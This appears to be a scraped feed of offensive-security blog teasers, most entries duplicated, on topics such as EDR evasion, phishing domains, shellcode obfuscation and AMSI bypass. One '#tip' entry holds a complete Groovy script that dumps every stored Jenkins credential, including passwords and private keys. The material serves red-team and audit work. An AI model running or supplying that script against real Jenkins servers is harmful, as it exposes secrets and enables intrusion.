EDR Internals for macOS and Linux
#outflank
Many public blogs and conference talks have covered Windows telemetry sources like kernel callbacks and ETW, but few mention macOS and Linux equivalents. Although most security professionals may not be surprised by this lack of coverage, one should not overlook these platforms. For example, developers using macOS often have privileged cloud accounts or access to intellectual property like source code. Linux servers may host sensitive databases or customer-facing applications. Defenders must have confidence in their tools for these systems, and attackers must understand how to evade them. This post dives into endpoint security products on macOS and Linux to understand their capabilities and identify weaknesses.
Endpoint detection and response (EDR) agents comprise multiple sensors: components that collect events from one or more telemetry sources. The agent formats raw telemetry data into a standard format and then forwards it to a log aggregator.
via Outflank Blog (author: Kyle Avery)
#outflank
Many public blogs and conference talks have covered Windows telemetry sources like kernel callbacks and ETW, but few mention macOS and Linux equivalents. Although most security professionals may not be surprised by this lack of coverage, one should not overlook these platforms. For example, developers using macOS often have privileged cloud accounts or access to intellectual property like source code. Linux servers may host sensitive databases or customer-facing applications. Defenders must have confidence in their tools for these systems, and attackers must understand how to evade them. This post dives into endpoint security products on macOS and Linux to understand their capabilities and identify weaknesses.
Endpoint detection and response (EDR) agents comprise multiple sensors: components that collect events from one or more telemetry sources. The agent formats raw telemetry data into a standard format and then forwards it to a log aggregator.
via Outflank Blog (author: Kyle Avery)
🔥2
Essential Steps for Management to Maximize the Value of a Penetration Test Report
#redsiege
by Tim Medin, CEO Penetration testing is a critical component of a well-rounded cybersecurity strategy. Pen testing identifies vulnerabilities before malicious actors can exploit them. However, the true value of […]
via RedSiege Blog (author: Red Siege)
#redsiege
by Tim Medin, CEO Penetration testing is a critical component of a well-rounded cybersecurity strategy. Pen testing identifies vulnerabilities before malicious actors can exploit them. However, the true value of […]
via RedSiege Blog (author: Red Siege)
Introducing The Shelf
#trustedsec
As an independent security consulting firm, we develop many custom capabilities over time. What happens when we decide that a capability no longer suits our needs to successfully execute tests for our customers?…
via TrustedSec Blog (author: Christopher Paschen)
#trustedsec
As an independent security consulting firm, we develop many custom capabilities over time. What happens when we decide that a capability no longer suits our needs to successfully execute tests for our customers?…
via TrustedSec Blog (author: Christopher Paschen)
One Phish Two Phish, Red Teams Spew Phish
#specterops
via SpecterOps Team Medium (author: Forrest Kasler)
#specterops
via SpecterOps Team Medium (author: Forrest Kasler)
SpecterOps
One Phish Two Phish, Red Teams Spew Phish - SpecterOps
PHISHING SCHOOL How to Give your Phishing Domains a Reputation Boost “Armed with the foreknowledge of my own death, I knew the giant couldn’t kill me. All the same, I preferred to keep my bones unbroken” — Big Phish When we send out our phishing emails, we…
👍1
WHFB and Entra ID : Say Hello to your new cache flow
#synacktiv
via Synacktiv Blog (author: Webmaster)
#synacktiv
via Synacktiv Blog (author: Webmaster)
#tip
Found script that extracts all secrets from Jenkins, not just the root scope like most of hacktricks-like notes offers.
Found script that extracts all secrets from Jenkins, not just the root scope like most of hacktricks-like notes offers.
import com.cloudbees.plugins.credentials.Credentials
Set<Credentials> allCredentials = new HashSet<Credentials>();
def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
com.cloudbees.plugins.credentials.Credentials.class
);
allCredentials.addAll(creds)
Jenkins.instance.getAllItems(com.cloudbees.hudson.plugins.folder.Folder.class).each{ f ->
creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
com.cloudbees.plugins.credentials.Credentials.class, f)
allCredentials.addAll(creds)
}
for (c in allCredentials) {
println(c.id)
if (c.properties.username) {
println(" description: " + c.description)
}
if (c.properties.username) {
println(" username: " + c.username)
}
if (c.properties.password) {
println(" password: " + c.password)
}
if (c.properties.passphrase) {
println(" passphrase: " + c.passphrase)
}
if (c.properties.secret) {
println(" secret: " + c.secret)
}
if (c.properties.privateKeySource) {
println(" privateKey: " + c.getPrivateKey())
}
println("")
}
🆒1
Everything You Need to Know About jQuery and its Vulnerabilities
#trustedsec
IntroductionJavaScript is used in some way on almost all modern web applications. There are several popular libraries that websites utilize, and each come with their own pros and cons. Today, we will focus on one of the…
via TrustedSec Blog (author: Luke Bremer)
#trustedsec
IntroductionJavaScript is used in some way on almost all modern web applications. There are several popular libraries that websites utilize, and each come with their own pros and cons. Today, we will focus on one of the…
via TrustedSec Blog (author: Luke Bremer)
Automating SCCM with Ludus: A Configuration Manager for Your Configuration Manager
#specterops
via SpecterOps Team Medium (author: Zach Stein)
#specterops
via SpecterOps Team Medium (author: Zach Stein)
Medium
Automating SCCM with Ludus: A Configuration Manager for Your Configuration Manager
TL;DR: Using Ludus as the backend, and with the help of Erik at Bad Sector Labs, I present a fully customizable SCCM deployment you can…
Hands On with Chip Off Non-Volatile Memory
#trustedsec
1.1 Introduction - Why We're HereWelcome to a deep dive into desoldering Non-Volatile storage chips! At the time of publishing, this is a recreation of my own first attempts at desoldering, and intended to encourage…
via TrustedSec Blog (author: Philip DuBois)
#trustedsec
1.1 Introduction - Why We're HereWelcome to a deep dive into desoldering Non-Volatile storage chips! At the time of publishing, this is a recreation of my own first attempts at desoldering, and intended to encourage…
via TrustedSec Blog (author: Philip DuBois)
onwebkitplaybacktargetavailabilitychanged?! New exotic events in the XSS cheat sheet
#portswigger
The power of our XSS cheat sheet is we get fantastic contributions from the web security community and this update is no exception. We had valuable contributions from Mozilla to remove events that no
via PortSwigger Research
#portswigger
The power of our XSS cheat sheet is we get fantastic contributions from the web security community and this update is no exception. We had valuable contributions from Mozilla to remove events that no
via PortSwigger Research
Tips and Tricks on Creating Your First Conference Talk
#trustedsec
Have you ever attended a security conference (or any conference for that matter) and thought about giving a presentation yourself, but don't know where to start? Well, I am here to help! This blog post will guide you…
via TrustedSec Blog (author: Whitney Phillips)
#trustedsec
Have you ever attended a security conference (or any conference for that matter) and thought about giving a presentation yourself, but don't know where to start? Well, I am here to help! This blog post will guide you…
via TrustedSec Blog (author: Whitney Phillips)
Nighthawk 0.3 – Automate All the Things
#mdsec
OpSec and evasion are two of the most important factors for red team success in modern day operations, and Nighthawk continues to lead the way in innovation on this front....
via MDSec Blog (author: Admin)
#mdsec
OpSec and evasion are two of the most important factors for red team success in modern day operations, and Nighthawk continues to lead the way in innovation on this front....
via MDSec Blog (author: Admin)
Adventures in Shellcode Obfuscation! Part 1: Overview
#redsiege
by Mike Saunders, Principal Security Consultant This blog is the first in a series of articles on methods for obfuscating shellcode. I’ll be focusing on how to obfuscate […]
via RedSiege Blog (author: Red Siege)
#redsiege
by Mike Saunders, Principal Security Consultant This blog is the first in a series of articles on methods for obfuscating shellcode. I’ll be focusing on how to obfuscate […]
via RedSiege Blog (author: Red Siege)
ScriptBlock Smuggling: Spoofing PowerShell Security Logs and Bypassing AMSI Without Reflection or Patching
#bcsecurity
Note: All code samples shown in the post can be found in our repo here In recent years, PowerShell tradecraft has seen a drop in popularity among pentesters, red teams, and to some extent APTs. There are several reasons for this, but at the core, it was the introduction of [...]
via BC Security Blog (author: Hubbl3)
#bcsecurity
Note: All code samples shown in the post can be found in our repo here In recent years, PowerShell tradecraft has seen a drop in popularity among pentesters, red teams, and to some extent APTs. There are several reasons for this, but at the core, it was the introduction of [...]
via BC Security Blog (author: Hubbl3)
Let’s Clone a Cloner...To Meet My Needs
#trustedsec
It was my second Physical Penetration Test here at TrustedSec and I was paired with colleague Paul Burkeland. After arriving at the hotel, Paul stated that he needed 16 AA batteries, so we went to the local CVS. I was…
via TrustedSec Blog (author: Costa Petros)
#trustedsec
It was my second Physical Penetration Test here at TrustedSec and I was paired with colleague Paul Burkeland. After arriving at the hotel, Paul stated that he needed 16 AA batteries, so we went to the local CVS. I was…
via TrustedSec Blog (author: Costa Petros)